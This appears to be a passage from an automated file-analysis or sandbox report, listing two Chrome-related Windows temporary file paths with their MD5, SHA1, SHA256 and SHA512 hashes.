SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Temp\scoped_dir4044_197832267\c1e019e8-8dc5-41f9-b377-cb36384ff21a.tmp

MD5 f8e609603d53c701422bbc4e026740c8
SHA1 5d08ba917111a8fce835be950477156720e57437
SHA256 aea99c066addc7157626d59326d8e5589402f6aac551a0560b92710ba68ded8a
SHA512 5cbdfc06d076665752b4a1aefd697f8af7dd2f673c2a65d363dde5e27e97451bbf6d6097c0b9003cccc886b1ec0cc3cd66be58c57076c181d2749249395462bc

C:\Program Files\Google\Chrome\Application\SetupMetrics\c4d5909c-b380-4a83-bfb5-1fd8a366296e.tmp

MD5 6d971ce11af4a6a93a4311841da1a178
SHA1 cbfdbc9b184f340cbad764abc4d8a31b9c250176
SHA256 338ddefb963d5042cae01de7b87ac40f4d78d1bfa2014ff774036f4bc7486783
SHA512 c58b59b9677f70a5bb5efd0ecbf59d2ac21cbc52e661980241d3be33663825e2a7a77adafbcec195e1d9d89d05b9ccb5e5be1a201f92cb1c1f54c258af16e29f